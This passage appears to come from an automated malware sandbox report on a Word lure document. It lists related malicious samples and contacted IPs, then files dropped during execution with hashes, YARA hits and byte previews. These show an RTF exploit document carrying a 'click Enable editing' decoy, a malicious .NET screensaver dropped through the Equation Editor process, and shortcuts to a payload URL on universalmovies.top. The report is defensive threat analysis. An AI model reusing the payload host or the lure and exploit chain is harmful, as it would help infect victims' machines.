                                                                              Techno_PO LV12406-003211.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.95
                                                                              • 104.21.74.191
                                                                              RY94HT.docxGet hashmaliciousRemcosBrowse
                                                                              • 172.67.162.95
                                                                              • 104.21.74.191
                                                                              Boweitech-PO240624.docx.docGet hashmaliciousAgentTeslaBrowse
                                                                              • 172.67.162.95
                                                                              • 104.21.74.191
                                                                              ZlHsuFAEKu.rtfGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.95
                                                                              • 104.21.74.191
                                                                              ikmi3dyY75.rtfGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.95
                                                                              • 104.21.74.191
                                                                              9l8h3C15F4.rtfGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.95
                                                                              • 104.21.74.191
                                                                              Purchase Order 78632.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                              • 172.67.162.95
                                                                              • 104.21.74.191
                                                                              2MbHBiqXH2.rtfGet hashmaliciousRedLineBrowse
                                                                              • 172.67.162.95
                                                                              • 104.21.74.191
                                                                              Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                                                              • 172.67.162.95
                                                                              • 104.21.74.191

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):0.025641774504967164
                                                                              Encrypted:false
                                                                              SSDEEP:6:I3DPcJmFXSHvxggLRbJmtYg/thzgNhis7/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPYf/6Y2UJvYg3J/
                                                                              MD5:03FB2889E16E52A751FD331D0BA1FC97
                                                                              SHA1:CBAEBD6367813873583BB2D15CBC3DE46E0157FF
                                                                              SHA-256:AEDF380BA37490F2682BBF8720EE79AEA6C5AB36C72034C648AB7512DDCBE85D
                                                                              SHA-512:88169652782FEFD57BF0AF8D4A1A5EDC25FA8970BF811CBA1DDA554A1C9A8F884D0F737BABBB13931AD8CC1EE04D0CCB4989A7A9C07074B938F3ECCA9A3DB4D3
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:......M.eFy...z.ft...cJ........S,...X.F...Fa.q................................E.M..).Q..................H....E........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nelb[1].doc

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Rich Text Format data, version 1
                                                                              Category:dropped
                                                                              Size (bytes):574773
                                                                              Entropy (8bit):3.713042760749409
                                                                              Encrypted:false
                                                                              SSDEEP:6144:dwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAuB+2:dB
                                                                              MD5:6B9167056AF49BF702C833AE4F581EF1
                                                                              SHA1:ED4886D86B8AD96A0A252190705D70E0FAC9289B
                                                                              SHA-256:13BC94A2F39A03F509036FF58462B974C401CAC0DF52CCE22223114F909B2F72
                                                                              SHA-512:4BA4FC52C2ADD76CB58CEC62F9AE608108AA77374C63C4416F4E5C2AC0FC4BF3569F3520E1AC77994842789015C767D3BB2DD1D384221D5FA865AB54BFC51A07
                                                                              Malicious:false
                                                                              Yara Hits:
                                                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nelb[1].doc, Author: ditekSHen
                                                                              Reputation:low
                                                                              Preview:{\rtf1..{\*\7bNZnNrrw8Gw4tjQ8OTnXusuSauwGlmKNomDEwVxZX9yvWDpP8OYkoeFUOirZfcI4welD8UJeqYgxujOP1930nOvkovn4Fc1kQjsls45hTGkBvXJdSWvMmO6jGKPmR3fufqCu5XSGp3pdVwidqIrofvw08hMk8EN62jOgdBYsJhZMYCmvZFUQNFa4poIzFPJszC78SHX3L0cNxcd24ATCngCUlTsXgrdjt12GS}..{\496451969please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and co

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scr

                                                                              Download File
                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):628736
                                                                              Entropy (8bit):7.397696471881069
                                                                              Encrypted:false
                                                                              SSDEEP:12288:LajzneBoLmk8bLq4xKNhZAb2drAJuU6ljqdLGtierEWhuV:2jznfL/qLxK7ZAbWAJJ6lGdLGtierEJV
                                                                              MD5:607868824F841FF4B6E24E997228D10D
                                                                              SHA1:76A91EE65551D7BABF8799BBECD9E78C44F47787
                                                                              SHA-256:7392B6A710583060D7F5BD8A3A7573FA0F278A543F961057FEC04445D017DE3B
                                                                              SHA-512:99F856165BCDFEAF6EF3E9F34C9D88CB30E3467F238EEF4489ADE96024D57D50DD002DA63E77DFEB82458B084A1535A7392AC159711337B8694E75822033EBC8
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 37%
                                                                              Reputation:low
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S.................0.................. ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......4...4...........................................................&.(......*".......*".(.....*Vs....(....t.........*...}.....(......~5...tL...(....&.(.....*..*.(.........*".s....&*.r...p.4...(?...(%...o@...oA....#..5....(B....0...*....}3....(........{3....X.....}2...*z.(........}6.....}7.....}8...*F.~9...(P....c...*6.~9....(Q...*F.~:...(P....c...*6.~:....(Q...*F.~;...(P....c...*6.~;....(Q...*F.~<...(P........*J.~<.........(R...*F.~=...(P....c...*6.~=....(Q...*F.~>...(P.

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\497AF0F0.doc

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Rich Text Format data, version 1
                                                                              Category:dropped
                                                                              Size (bytes):574773
                                                                              Entropy (8bit):3.713042760749409
                                                                              Encrypted:false
                                                                              SSDEEP:6144:dwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAuB+2:dB
                                                                              MD5:6B9167056AF49BF702C833AE4F581EF1
                                                                              SHA1:ED4886D86B8AD96A0A252190705D70E0FAC9289B
                                                                              SHA-256:13BC94A2F39A03F509036FF58462B974C401CAC0DF52CCE22223114F909B2F72
                                                                              SHA-512:4BA4FC52C2ADD76CB58CEC62F9AE608108AA77374C63C4416F4E5C2AC0FC4BF3569F3520E1AC77994842789015C767D3BB2DD1D384221D5FA865AB54BFC51A07
                                                                              Malicious:false
                                                                              Yara Hits:
                                                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\497AF0F0.doc, Author: ditekSHen
                                                                              Reputation:low
                                                                              Preview:{\rtf1..{\*\7bNZnNrrw8Gw4tjQ8OTnXusuSauwGlmKNomDEwVxZX9yvWDpP8OYkoeFUOirZfcI4welD8UJeqYgxujOP1930nOvkovn4Fc1kQjsls45hTGkBvXJdSWvMmO6jGKPmR3fufqCu5XSGp3pdVwidqIrofvw08hMk8EN62jOgdBYsJhZMYCmvZFUQNFa4poIzFPJszC78SHX3L0cNxcd24ATCngCUlTsXgrdjt12GS}..{\496451969please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and co

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                              Category:dropped
                                                                              Size (bytes):5632
                                                                              Entropy (8bit):3.947043578001658
                                                                              Encrypted:false
                                                                              SSDEEP:48:rfUbMMPoyChj56ttFmSlbkCBBFO0UtzGrFjHxZJCZyc8:zUYMPoyCt8ttFVlLBLKtzGrFjHRCZD
                                                                              MD5:436555078F71AA2CED9AA747DB10FD7F
                                                                              SHA1:C3846E92257B60FC981BF42F25451F0CD590D057
                                                                              SHA-256:037F3906037465FDD21DF26763321A703A00B3E85572309BAD49B50104EC3DDD
                                                                              SHA-512:5251795801FDB128BD4ADB98C02917571D71DF7F606B5ECB9FD4B96EB7BCBC3B05006A7C5EC1D084F79A6800F29C4BD5A5D16B2F9ABB4DC6CCE249C971CDC8CA
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Reputation:low
                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{07625DCE-52C4-4F2B-9614-2C3F55D472B8}.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1536
                                                                              Entropy (8bit):1.354223167367391
                                                                              Encrypted:false
                                                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbJ:IiiiiiiiiifdLloZQc8++lsJe1Mze
                                                                              MD5:07D3B2764936F1DFD502CAA1FE793BBA
                                                                              SHA1:771A0BF7AD570C260864424CE77EA404151F9252
                                                                              SHA-256:2EFDE96D97C571F94ABE64BB029652C603A6B2B2A36F8BA0831DBA177A9D6301
                                                                              SHA-512:CB58E4340C8D200F5DDB3DD969EF6E101E042596D6103ECFC959ED72A0E8696344654D4CC4DBA2A47391B978E897F7DDE51B4DFF401C5F35C2919D6A32588624
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{61FC82B4-E053-4F29-B36E-352ECE0A54D4}.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1024
                                                                              Entropy (8bit):0.05390218305374581
                                                                              Encrypted:false
                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6E89F3D4-3E57-466E-9EBF-0491EB4331E0}.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):46874
                                                                              Entropy (8bit):3.551464186925344
                                                                              Encrypted:false
                                                                              SSDEEP:768:uaWvW5Kq2g0Zos0SCWiMuz1rqAyLt+eqViz9yCFcEhZVsft:FgemiDvwxKrK2ft
                                                                              MD5:AC7C710B6CA9D66ED9923D65C708B21B
                                                                              SHA1:756E2D7C42EF9BF05DA7EA871B077BB6DAFCD8E7
                                                                              SHA-256:C1BEA8318A21530E776F4E3336A3F5E8AFE04F52FBB44F254304A9F36C570B68
                                                                              SHA-512:B366139A262F47A8C38FC1B5E649F9529E5E89471FF34B543A484737F84C6AF7185AB363946BFBD17DB9BA6642D0CE5520BEA236693CA27E3AF123816809F65C
                                                                              Malicious:false
                                                                              Preview:..d.M.B.C.....B.E.S.O.N.D.E.R.H.E.D.E. .B.E.S.O.N.D.E.R.H.E.D.E. .V.I.R. .H.I.E.R.D.I.E. .M.A.A.N.D.....D.R.A.E.N.D.E. .N.R... .H.O.E.V.....3.0.2.0.8. .N.B.C. .D.R.A.A.G. .3.0. .S.T.K.....3.0.3.0.8. .N.B.C. .D.R.A.A.G. .6. .S.T.K.....3.2.0.0.7.X. .N.B.C. .D.R.A.A.G. .7.4. .S.T.K.....3.3.0.0.5. .N.B.C. .w.a.t. .5. .s.t.e.l.l.e. .d.r.a.....5.2.7.9.9. ./. .8.0.0.U. .(.2.5.8.7.7./.2.1.). .N.B.C. .w.a.t. .3.0. .P.C.S. .d.r.a.....6.0.0.1. .N.B.C. .w.a.t. .1.0.0. .s.t.u.k.s. .d.r.a.....6.0.0.4. .N.B.C. .w.a.t. ...................f...h...................................R...T..................................................................................................................................................................................................................................................................................................<...$..$.If........!v..h.#v..9.:V....l...,..t.......9..6.,.....5.....9.9...../.............B.....a..].p............yt%~D.....d........gd%

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E09EA50C-093E-49C3-BBEF-C7A4A0CB7F6A}.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):355840
                                                                              Entropy (8bit):3.4571116056737323
                                                                              Encrypted:false
                                                                              SSDEEP:6144:FyemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryeQ:u+
                                                                              MD5:975E52C60B72CB852647E2DFB421C3DA
                                                                              SHA1:875F1299875367094D21043B9A1E8EB6A68D5619
                                                                              SHA-256:66315F9508E443539082CCAAC2F668A210AD3553C15B471A55279FC233CD2F7D
                                                                              SHA-512:922BD7D85889E132E3970FE01691AE4FDEA33D2125CA3AAA0B4BA26605A368007F9E243A79FF952336EB917D28D4BB73536347D782DEC23C794FF3C668FD78E3
                                                                              Malicious:false
                                                                              Preview:9.6.4.5.1.9.6.9.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                                                              C:\Users\user\AppData\Local\Temp\{12AE7A01-4713-4971-98D2-9583BF9DF0DA}

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):0.025641774504967164
                                                                              Encrypted:false
                                                                              SSDEEP:6:I3DPcJmFXSHvxggLRbJmtYg/thzgNhis7/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPYf/6Y2UJvYg3J/
                                                                              MD5:03FB2889E16E52A751FD331D0BA1FC97
                                                                              SHA1:CBAEBD6367813873583BB2D15CBC3DE46E0157FF
                                                                              SHA-256:AEDF380BA37490F2682BBF8720EE79AEA6C5AB36C72034C648AB7512DDCBE85D
                                                                              SHA-512:88169652782FEFD57BF0AF8D4A1A5EDC25FA8970BF811CBA1DDA554A1C9A8F884D0F737BABBB13931AD8CC1EE04D0CCB4989A7A9C07074B938F3ECCA9A3DB4D3
                                                                              Malicious:false
                                                                              Preview:......M.eFy...z.ft...cJ........S,...X.F...Fa.q................................E.M..).Q..................H....E........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\{9F0DE7E2-4170-462D-A812-4EEEE2B7AAE7}

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):0.025577510879182384
                                                                              Encrypted:false
                                                                              SSDEEP:6:I3DPccVvxggLROoe5lltg4nlZ/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPV78l24nlHvYg3J/
                                                                              MD5:F31E5CE13D286F4BB79241DB02CD4185
                                                                              SHA1:8C293C49FA4227E50D3F3024A1EA716D7FB170EC
                                                                              SHA-256:A2B89700BF677B66A17BB9B74E8A2DB9953CC2E6B2B67842AA546E93807B9ACD
                                                                              SHA-512:454D21551E50A2D5CAF6233E99688DC61A7132D5E67A80D6B450D1375F582F444210F8D21CCD60F9F1596E34736F4CFEF998214052348C997BC814AFC5795057
                                                                              Malicious:false
                                                                              Preview:......M.eFy...zEYN.f..C.Q&.u...S,...X.F...Fa.q.................................L.Y..N..........V.@h..I.K....p......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Order-1351125X.docx.LNK

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:11 2023, mtime=Fri Aug 11 15:42:11 2023, atime=Tue Jun 25 12:13:38 2024, length=16426, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):1059
                                                                              Entropy (8bit):4.5002695685410785
                                                                              Encrypted:false
                                                                              SSDEEP:12:8Cj5/MjgXg/XAlCPCHaXVBYmgB/qPX+WnCKOX1QH1juicvbFSJQHPDtZ3YilMME7:8g5/S/XTFKmg4XlBNeRHPDv3qsk7N
                                                                              MD5:7E4D8FFD5DF6D22D9324E8C45BCB2F29
                                                                              SHA1:5864B6A843E2BD439B54614C2B04BFE6273F7F8F
                                                                              SHA-256:813136F4D97570469036DFB0695ACF077E9C821E272FAE90B107B65713639384
                                                                              SHA-512:D323FB2E9719A1BB16522FEDFEA9AEC64E62B1F835261AF921152D622548DCFA1E015017475F8B830284213D49A09EC0A6B046F63CA098C253F9E88B20DC1009
                                                                              Malicious:false
                                                                              Preview:L..................F.... .......r.......r...0.(~....*@...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.i..user.8......QK.X.X.i*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.*@...X.i .ORDER-~1.DOC..\.......WF..WF.*.........................O.r.d.e.r.-.1.3.5.1.1.2.5.X...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop\Order-1351125X.docx.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.r.d.e.r.-.1.3.5.1.1.2.5.X...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......284992..........D_....3N.

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Generic INItialization configuration [folders]
                                                                              Category:dropped
                                                                              Size (bytes):115
                                                                              Entropy (8bit):4.841477143075871
                                                                              Encrypted:false
                                                                              SSDEEP:3:M14JJ9UWQNm7Sm4lEJIKT+S9UWQNm7Sv:MCJJ2s76gIKKS2s7c
                                                                              MD5:1758CDD4DFB722B1F24F9F5F0C68449E
                                                                              SHA1:827DC6E8EC23C07A65C0940CE4666DBA37247627
                                                                              SHA-256:539B49530CEED8F6E52EDC258E936B7B5F4AC60DC2684751470BF290B073E663
                                                                              SHA-512:D9348BC9909B1A6FD372D7ADBBD2491BC83646626F9F2698006B86E1F3AE8F3132BA81834EF5D4B3CF5DCB82A85E4BDC4C969FB02BB41C766B65296A57A9C097
                                                                              Malicious:false
                                                                              Preview:[doc]..nelb.doc.url=0..Order-1351125X.docx.LNK=0..[folders]..universalmovies.top.url=0..Order-1351125X.docx.LNK=0..

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nelb.doc.url

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://universalmovies.top/nelb.doc>), ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):62
                                                                              Entropy (8bit):4.63926425497832
                                                                              Encrypted:false
                                                                              SSDEEP:3:HRAbABGQYm2ftREJIKT+RAJVUn:HRYFVm4DgIKKmJW
                                                                              MD5:4DC4B71E6895435832003136CCD9FF27
                                                                              SHA1:4174009CB974E21157DB7A8382520382E5424266
                                                                              SHA-256:B0DFF51FCE90AD4F8E95D289F3A92B876F19912BC9E29E0F79E8B2536351DA10
                                                                              SHA-512:CBB2274140DFB16844F86A7BB266AE7FF3EB5B075BBAEC287F5F0A8935DE5A40BB7B17A307595E693BE3D5C8CACBDD65D64D151FCC8E60175575BF6A41ED7620
                                                                              Malicious:true
                                                                              Preview:[InternetShortcut]..URL=https://universalmovies.top/nelb.doc..

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\universalmovies.top.url

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://universalmovies.top/>), ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):54
                                                                              Entropy (8bit):4.543296354659384
                                                                              Encrypted:false
                                                                              SSDEEP:3:HRAbABGQYm2ftREJIKT+yv:HRYFVm4DgIKKyv
                                                                              MD5:3C956186B2FF37FBFA333BDF67DDB8BD
                                                                              SHA1:728D4652328FCEE86DD0DDE155AAA55368CE02DA
                                                                              SHA-256:7B8479B5BE126F67DBD13A73A9210F43E60155F0AD59296F8E7870F69989214B
                                                                              SHA-512:386117368A28FEB1D83B8121057D59BE20D129AC9D2583EF3F22C1D56455CA186EA95333B4A3B0727A7E35855D8C75DD8FFE779B891213DFE55BEEAAFF65A800
                                                                              Malicious:true
                                                                              Preview:[InternetShortcut]..URL=https://universalmovies.top/..

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):162
                                                                              Entropy (8bit):2.4797606462020307
                                                                              Encrypted:false
                                                                              SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
                                                                              MD5:C4615A023DC40AFFAEAE6CF07410BB43
                                                                              SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
                                                                              SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
                                                                              SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
                                                                              Malicious:false
                                                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2
                                                                              Entropy (8bit):1.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:Qn:Qn
                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                              Malicious:false
                                                                              Preview:..

                                                                              C:\Users\user\AppData\Roaming\nelb82019.scr

                                                                              Download File
                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):628736
                                                                              Entropy (8bit):7.397696471881069
                                                                              Encrypted:false
                                                                              SSDEEP:12288:LajzneBoLmk8bLq4xKNhZAb2drAJuU6ljqdLGtierEWhuV:2jznfL/qLxK7ZAbWAJJ6lGdLGtierEJV
                                                                              MD5:607868824F841FF4B6E24E997228D10D
                                                                              SHA1:76A91EE65551D7BABF8799BBECD9E78C44F47787
                                                                              SHA-256:7392B6A710583060D7F5BD8A3A7573FA0F278A543F961057FEC04445D017DE3B
                                                                              SHA-512:99F856165BCDFEAF6EF3E9F34C9D88CB30E3467F238EEF4489ADE96024D57D50DD002DA63E77DFEB82458B084A1535A7392AC159711337B8694E75822033EBC8
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 37%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S.................0.................. ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......4...4...........................................................&.(......*".......*".(.....*Vs....(....t.........*...}.....(......~5...tL...(....&.(.....*..*.(.........*".s....&*.r...p.4...(?...(%...o@...oA....#..5....(B....0...*....}3....(........{3....X.....}2...*z.(........}6.....}7.....}8...*F.~9...(P....c...*6.~9....(Q...*F.~:...(P....c...*6.~:....(Q...*F.~;...(P....c...*6.~;....(Q...*F.~<...(P........*J.~<.........(R...*F.~=...(P....c...*6.~=....(Q...*F.~>...(P.

                                                                              C:\Users\user\Desktop\~$der-1351125X.docx.doc

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
